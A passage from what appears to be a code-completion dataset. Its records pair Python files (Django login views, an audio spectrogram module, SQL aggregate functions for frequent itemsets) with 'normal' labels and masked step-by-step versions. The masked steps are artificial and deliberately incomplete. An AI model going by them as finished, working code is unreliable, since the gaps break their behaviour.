"step-4": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request) \n return render(request, 'registration/logout.html')\n\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import pygame
import wave
import threading
import numpy as np
import pylab
import struct
import io
from PIL import Image
import sounddevice as sd
# 处理音频频谱
# voice.wav 格式:8000 rate 16bit 单声道
class SpectrumMap:
def __init__(self):
FILENAME = 'Sound/SoundResource/voice.wav'
self.wavefile = wave.open(FILENAME, 'r')
self.nchannels = self.wavefile.getnchannels()
self.sample_width = self.wavefile.getsampwidth()
self.framerate = self.wavefile.getframerate()
self.numframes = self.wavefile.getnframes()
def seek(self, frame: int):
self.wavefile.setpos(frame)
def map(self, count: int, clear: bool=True):
if clear:
pylab.plt.clf()
y = np.zeros(count)
for i in range(count):
val = self.wavefile.readframes(1)
left = val[0:2]
try:
v = struct.unpack('h', left)[0]
y[i] = v
except struct.error:
pass
data = io.BytesIO()
pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
crop = image.crop((81, 59, 575, 426))
# crop = image
return crop
def raw(self, count, clear: bool=True):
if clear:
pylab.plt.clf()
y = np.zeros(count)
for i in range(count):
val = self.wavefile.readframes(1)
left = val[0:2]
try:
v = struct.unpack('h', left)[0]
y[i] = v
except struct.error:
pass
data = io.BytesIO()
# y = abs(np.fft.fft(y) * self.nchannels)
y = y[:len(y)//2]
# pylab.specgram(y, NFFT=1024, Fs=self.framerate, noverlap=900)
pylab.plt.ylim(-32768, 32768)
pylab.plot(range(count//2), y)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
crop = image.crop((81, 59, 575, 426))
# crop = image
return crop
@staticmethod
def blend(sp1, sp2, count: int):
im1 = sp1.map(count, clear=True)
im2 = sp2.raw(count, clear=False)
res = Image.blend(im1, im2, 0.5)
return res
# 处理音频频谱 - 尝试实时录音
# 0 Microsoft 声音映射器 - Output, MME (0 in, 2 out)
# < 1 扬声器 (Realtek High Definition, MME (0 in, 2 out)
# 2 主声音驱动程序, Windows DirectSound (0 in, 2 out)
# 3 扬声器 (Realtek High Definition Audio), Windows DirectSound (0 in, 2 out)
# 4 扬声器 (Realtek High Definition Audio), Windows WASAPI (0 in, 2 out)
# 5 Speakers (Realtek HD Audio output), Windows WDM-KS (0 in, 6 out)
# 6 立体声混音 (Realtek HD Audio Stereo input), Windows WDM-KS (2 in, 0 out)
# 7 线路输入 (Realtek HD Audio Line input), Windows WDM-KS (2 in, 0 out)
# 8 FrontMic (Realtek HD Audio Front Mic input), Windows WDM-KS (2 in, 0 out)
# 9 麦克风 (Realtek HD Audio Mic input), Windows WDM-KS (2 in, 0 out)
# fs = 44100 # Hz
# length = 5 # s
# recording = sd.rec(frames=fs * length, samplerate=fs, blocking=True, channels=1)
class SpectrumMap2:
def __init__(self):
devices = sd.query_devices()
device = 11
for i in range(len(devices)):
d = devices[i]
if '立体声混音' in d['name']:
device = i
sd.default.device[0] = device
print('采用', devices[device]['name'], '录音')
self.nchannels = 1
self.framerate = 44100
def record(self, period: float):
recording = sd.rec(frames=int(self.framerate * period),
samplerate=self.framerate, blocking=True, channels=self.nchannels, dtype='int16')
return recording.reshape((recording.size, ))
def map(self, ndata, clear: bool=True):
if clear:
pylab.plt.clf()
y = ndata
data = io.BytesIO()
pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
# crop = image.crop((81, 59, 575, 426))
crop = image
return crop
@staticmethod
def raw(ndata, clear: bool=True):
if clear:
pylab.plt.clf()
y = ndata
count = len(ndata)
data = io.BytesIO()
# y = abs(np.fft.fft(y) * self.nchannels)
y = y[:len(y)//2]
pylab.plt.ylim(-32768, 32768)
pylab.plot(range(count//2), y)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
# crop = image.crop((81, 59, 575, 426))
crop = image
return crop
# @staticmethod
# def blend(sp1, sp2, ndata):
# im1 = sp1.map(ndata, clear=True)
# im2 = sp2.raw(ndata, clear=False)
# res = Image.blend(im1, im2, 0.5)
# return res
def fetch(self, period: float):
ndata = self.record(period)
# im1 = self.map(ndata, clear=True)
im2 = self.raw(ndata, clear=True)
# res = Image.blend(im1, im2, 0.5)
res = im2
return res
class Sound:
@staticmethod
def load():
pygame.mixer.init()
filename_song = 'Sound/SoundResource/world.execute(me);.mp3'
pygame.mixer.music.load(filename_song)
@staticmethod
def play():
pygame.mixer.music.play()
@staticmethod
def pause():
pygame.mixer.music.pause()
@staticmethod
def stop():
pygame.mixer.music.stop()
|
normal
|
{
"blob_id": "fbde00d727d7ea99d1a7704f46cb9850c8b210d7",
"index": 2610,
"step-1": "<mask token>\n\n\nclass SpectrumMap:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-2": "<mask token>\n\n\nclass SpectrumMap:\n <mask token>\n <mask token>\n <mask token>\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-3": "<mask token>\n\n\nclass SpectrumMap:\n <mask token>\n\n def seek(self, frame: int):\n self.wavefile.setpos(frame)\n\n def map(self, count: int, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-4": "import pygame\nimport wave\nimport threading\nimport numpy as np\nimport pylab\nimport struct\nimport io\nfrom PIL import Image\nimport sounddevice as sd\n\n\nclass SpectrumMap:\n\n def __init__(self):\n FILENAME = 'Sound/SoundResource/voice.wav'\n self.wavefile = wave.open(FILENAME, 'r')\n self.nchannels = self.wavefile.getnchannels()\n self.sample_width = self.wavefile.getsampwidth()\n self.framerate = self.wavefile.getframerate()\n self.numframes = self.wavefile.getnframes()\n\n def seek(self, frame: int):\n self.wavefile.setpos(frame)\n\n def map(self, count: int, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-5": "import pygame\nimport wave\nimport threading\nimport numpy as np\nimport pylab\nimport struct\nimport io\nfrom PIL import Image\nimport sounddevice as sd\n\n\n# 处理音频频谱\n# voice.wav 格式:8000 rate 16bit 单声道\nclass SpectrumMap:\n def __init__(self):\n FILENAME = 'Sound/SoundResource/voice.wav'\n self.wavefile = wave.open(FILENAME, 'r')\n\n self.nchannels = self.wavefile.getnchannels()\n self.sample_width = self.wavefile.getsampwidth()\n self.framerate = self.wavefile.getframerate()\n self.numframes = self.wavefile.getnframes()\n\n def seek(self, frame: int):\n self.wavefile.setpos(frame)\n\n def map(self, count: int, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n # crop = image\n return crop\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n\n data = io.BytesIO()\n # y = abs(np.fft.fft(y) * self.nchannels)\n y = y[:len(y)//2]\n # pylab.specgram(y, NFFT=1024, Fs=self.framerate, noverlap=900)\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count//2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n # crop = image\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\n# 处理音频频谱 - 尝试实时录音\n# 0 Microsoft 声音映射器 - Output, MME (0 in, 2 out)\n# < 1 扬声器 (Realtek High Definition, MME (0 in, 2 out)\n# 2 主声音驱动程序, Windows DirectSound (0 in, 2 out)\n# 3 扬声器 (Realtek High Definition Audio), Windows DirectSound (0 in, 2 out)\n# 4 扬声器 (Realtek High Definition Audio), Windows WASAPI (0 in, 2 out)\n# 5 Speakers (Realtek HD Audio output), Windows WDM-KS (0 in, 6 out)\n# 6 立体声混音 (Realtek HD Audio Stereo input), Windows WDM-KS (2 in, 0 out)\n# 7 线路输入 (Realtek HD Audio Line input), Windows WDM-KS (2 in, 0 out)\n# 8 FrontMic (Realtek HD Audio Front Mic input), Windows WDM-KS (2 in, 0 out)\n# 9 麦克风 (Realtek HD Audio Mic input), Windows WDM-KS (2 in, 0 out)\n\n# fs = 44100 # Hz\n# length = 5 # s\n# recording = sd.rec(frames=fs * length, samplerate=fs, blocking=True, channels=1)\nclass SpectrumMap2:\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period),\n samplerate=self.framerate, blocking=True, channels=self.nchannels, dtype='int16')\n return recording.reshape((recording.size, ))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n # crop = image.crop((81, 59, 575, 426))\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n\n data = io.BytesIO()\n # y = abs(np.fft.fft(y) * self.nchannels)\n y = y[:len(y)//2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count//2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n # crop = image.crop((81, 59, 575, 426))\n crop = image\n return crop\n\n # @staticmethod\n # def blend(sp1, sp2, ndata):\n # im1 = sp1.map(ndata, clear=True)\n # im2 = sp2.raw(ndata, clear=False)\n # res = Image.blend(im1, im2, 0.5)\n # return res\n\n def fetch(self, period: float):\n ndata = self.record(period)\n # im1 = self.map(ndata, clear=True)\n im2 = self.raw(ndata, clear=True)\n # res = Image.blend(im1, im2, 0.5)\n res = im2\n return res\n\n\nclass Sound:\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-ids": [
12,
14,
16,
18,
19
]
}
|
[
12,
14,
16,
18,
19
] |
def foo(x, y=5):
def bar(x):
return x + 1
return bar(y * 2)
print(foo(3))
|
normal
|
{
"blob_id": "80d1979c5767d0ff90f464651c9d0ca6d65effb2",
"index": 6472,
"step-1": "<mask token>\n",
"step-2": "def foo(x, y=5):\n\n def bar(x):\n return x + 1\n return bar(y * 2)\n\n\n<mask token>\n",
"step-3": "def foo(x, y=5):\n\n def bar(x):\n return x + 1\n return bar(y * 2)\n\n\nprint(foo(3))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import re
import itertools
import setpath
import functions
import lib.jopts as jopts
from operator import itemgetter
import random
__docformat__ = 'reStructuredText en'
re_params=re.compile('(\w*):(.*)')
def consumer(func):
"""A decorator, advances func to its first yield point when called.
"""
from functools import wraps
@wraps(func)
def wrapper(*args,**kw):
gen = func(*args, **kw)
gen.next()
return gen
return wrapper
class freqitemsets:
"""
.. function:: freqitemsets(datacol, [threshold, noautothres, stats, maxlen]) -> [itemset_id:int, itemset_length:int, itemset_frequency:int, item:text]
Calculates frequent itemsets on a given column (datacol). The algorithm is tuned for the
case when we have many different items (in the order of millions), many input itemsets, but
small itemset length (10-20).
Returned table schema:
:itemset_id: Automatic itemset id
:itemset_length: Length of itemset
:itemset_frequency: How many times an itemset has been found
:item: Itemset's item value
Parameters:
:datacol:
Column on which to calculate frequent itemsets
:threshold: Default is 2
How many times an freq. itemset must appear for it to appear in the results
:noautothres: 1/0 (Default is 0)
Do not calculate the threshold automatically
:stats: 1/0 (Default is 0)
Return frequent itemset statistics
:maxlen: NUMBER (Default is no limit at all)
Maximum itemset length to search
Examples:
>>> table1('''
... 'car wood bike' 'first group'
... 'car car wood' 'first group'
... 'car wood' 'first group'
... 'car wood ice' 'first group'
... 'ice' 'second group'
... 'car ice' 'second group'
... 'car cream toy' 'second group'
... 'icecream ice car toy' 'second group'
... ''')
>>> sql("select b,freqitemsets(a, 'threshold:2', 'noautothres:1', 'maxlen:2') from table1 group by b")
b | itemset_id | itemset_length | itemset_frequency | item
---------------------------------------------------------------------
first group | 1 | 1 | 4 | wood
first group | 2 | 1 | 4 | car
first group | 3 | 2 | 4 | car
first group | 3 | 2 | 4 | wood
second group | 1 | 1 | 3 | ice
second group | 2 | 1 | 3 | car
second group | 3 | 1 | 2 | toy
second group | 4 | 2 | 2 | car
second group | 4 | 2 | 2 | ice
second group | 5 | 2 | 2 | car
second group | 5 | 2 | 2 | toy
>>> sql("select b,freqitemsets(a, 'stats:1') from table1 group by b")
b | MaxTransactionLength | CombinationCount | PassedTransactions | ValidKeywords
-------------------------------------------------------------------------------------------
first group | 3 | 2 | 3 | 2
first group | 3 | 1 | 1 | 2
first group | 3 | 0 | 0 | 0
second group | 4 | 3 | 3 | 3
second group | 4 | 0 | 3 | 0
"""
registered=True
multiset=True
def __init__(self):
self.threshold=2
self.startingthreshold=2
self.autothres=1
self.compress=0
self.initstatic=False
self.input={}
self.maxlength=0
self.kwcode={}
self.codekw={}
self.maxkwcode=0
self.overthres={}
self.belowthres={}
self.passedkw={}
self.init=True
self.itemset_id=0
self.maxlen=None
self.stats=False
def initargs(self, args):
self.init=False
for i in xrange(1, len(args)):
v=re_params.match(args[i])
if v is not None and v.groups()[0]!='' and v.groups()[1]!='' and i>0:
v=v.groups()
if v[0]=='threshold':
try:
self.threshold=int(v[1])
self.startingthreshold=self.threshold
except KeyboardInterrupt:
raise
except:
raise functions.OperatorError("FreqItemsets",'No integer value given for threshold')
if v[0]=='noautothres':
self.autothres=0
if v[0]=='compress':
self.compress=1
if v[0]=='maxlen':
self.maxlen=int(v[1])
if v[0]=='stats':
self.stats=True
def demultiplex(self, data):
iterable=None
iterpos=-1
for i in xrange(len(data)):
if hasattr(data[i],'__iter__')==True:
iterable=data[i]
iterpos=i
break
if iterpos==-1:
yield list(data)
else:
pre=list(data[0:iterpos])
post=list(data[iterpos+1:])
for i in iterable:
if hasattr(i,'__iter__')==False:
yield pre+[i]+post
else:
yield pre+list(i)+post
def insertcombfreq(self, comb, freq):
if comb in self.overthres:
self.overthres[comb]+=freq
else:
if comb in self.belowthres:
self.belowthres[comb]+=freq
else:
self.belowthres[comb]=freq
if self.belowthres[comb]>=self.threshold:
self.overthres[comb]=self.belowthres[comb]
del(self.belowthres[comb])
for k in comb:
if self.compress==0:
self.passedkw[k]=True
elif not k in self.passedkw:
self.passedkw[k]=self.overthres[comb]
else:
self.passedkw[k]+=self.overthres[comb]
def insertitemset(self, itemset):
if itemset not in self.input:
self.input[itemset]=1
else:
self.input[itemset]+=1
def cleanitemsets(self, minlength):
newitemsets={}
for k,v in self.input.iteritems():
itemset=tuple(i for i in k if i in self.passedkw)
if self.compress==1:
esoteric_itemset=tuple(i for i in itemset if self.passedkw[i]==v)
if len(esoteric_itemset)>0:
if len(itemset)>=minlength:
self.overthres[itemset]=v
itemset=tuple(i for i in itemset if self.passedkw[i]!=v)
if len(itemset)>=minlength:
if itemset not in newitemsets:
newitemsets[itemset]=v
else:
newitemsets[itemset]+=v
self.input=newitemsets
def step(self, *args):
if self.init==True:
self.initargs(args)
if len(args[0])==0:
return
itms=sorted(set(args[0].split(' ')))
itms=[x for x in itms if x!='']
li=len(itms)
if li>0:
if li>self.maxlength:
self.maxlength=li
inputkws=[]
for kw in itms:
if len(kw)==0:
print itms, args[0], len(args[0]), li
if kw not in self.kwcode:
self.kwcode[kw]=self.maxkwcode
self.codekw[self.maxkwcode]=kw
inputkws.append(self.maxkwcode)
self.insertcombfreq( (self.maxkwcode,),1 )
self.maxkwcode+=1
else:
itm=self.kwcode[kw]
self.insertcombfreq( (itm,),1 )
inputkws.append(itm)
if len(inputkws)>1:
self.insertitemset(tuple(inputkws))
def final(self):
if not self.stats:
yield ('itemset_id', 'itemset_length', 'itemset_frequency', 'item')
else:
yield ('MaxTransactionLength', 'CombinationCount', 'PassedTransactions', 'ValidKeywords')
splist=[{},{}]
del(self.kwcode)
splist[1]=self.overthres
if self.stats:
yield [self.maxlength, len(splist[1]), len(self.input), len(self.passedkw)]
if not self.stats:
for its,v in sorted(splist[1].items(), key=itemgetter(1),reverse=True):
self.itemset_id+=1
for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):
yield i
if self.maxlen==None:
self.maxlen=self.maxlength
for l in xrange(2, min(self.maxlength+1, self.maxlen+1)):
splist.append({})
self.belowthres={}
self.overthres={}
prevl=l-1
# Autothresholding
if self.autothres==1:
if len(self.input)==0 or len(self.passedkw)==0:
break
else:
self.threshold=self.startingthreshold + int(len(self.passedkw)/len(self.input))
self.cleanitemsets(l)
self.passedkw={}
prevsplist = splist[prevl]
icombs = itertools.combinations
insertcomb = self.insertcombfreq
for k,v in self.input.iteritems():
for k in icombs(k,l):
insertit=True
for i1 in icombs(k, prevl):
if i1 not in prevsplist:
insertit=False
break
if insertit:
insertcomb( k,v )
splist[l-1]={}
splist[l]=self.overthres
if self.stats:
yield [self.maxlength, len(splist[l]), len(self.input), len(self.passedkw)]
if not self.stats:
for its,v in sorted(splist[l].items(), key=itemgetter(1),reverse=True):
self.itemset_id+=1
for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):
yield i
del(self.overthres)
del(self.belowthres)
del(self.passedkw)
del(self.input)
del(self.codekw)
del(splist)
class sampledistvals:
"""
.. function:: sampledistvals(sample_size, C1, C2, C3) -> [C1, C2, C3]
Sampledistvals returns sample_size distinct values for each of the input C1..Cn columns.
>>> table1('''
... test1 2 3
... test1 2 3
... test2 4 2
... test4 2 t
... ''')
>>> sql("select sampledistvals(3, a, b, c) from table1")
C1 | C2 | C3
---------------------------------------------
["test1","test2","test4"] | [2,4] | [2,3,"t"]
"""
registered=True
def __init__(self):
self.vals=None
self.lenargs = -1
self.init=True
def step(self, *args):
if self.init:
self.lenargs = len(args)
self.vals = a=[set() for i in xrange(self.lenargs-1)]
self.init = False
for i in xrange(1, self.lenargs):
if len(self.vals[i-1])<args[0] and args[i] not in self.vals[i-1]:
self.vals[i-1].add(args[i])
def final(self):
yield tuple(['C'+str(i) for i in xrange(1, self.lenargs)] )
yield [jopts.toj(list(i)) for i in self.vals]
class sample:
"""
.. function:: sample(sample_size, C1, C2, C3)
Sample returns a random sample_size set of rows.
>>> table1('''
... test1 2 3
... test1 2 3
... test2 4 2
... test4 2 t
... ''')
>>> sql("select sample(2, a, b, c) from table1") # doctest: +ELLIPSIS
C1 | C2 | C3
---------------
...
"""
registered=True
def __init__(self):
self.samplelist = []
self.index = 0
def step(self, *args):
sample_count = args[0]
# Generate the reservoir
if self.index < sample_count:
self.samplelist.append(args[1:])
else:
r = random.randint(0, self.index)
if r < sample_count:
self.samplelist[r] = args[1:]
self.index += 1
def final(self):
if len(self.samplelist) == []:
yield tuple(['C1'])
else:
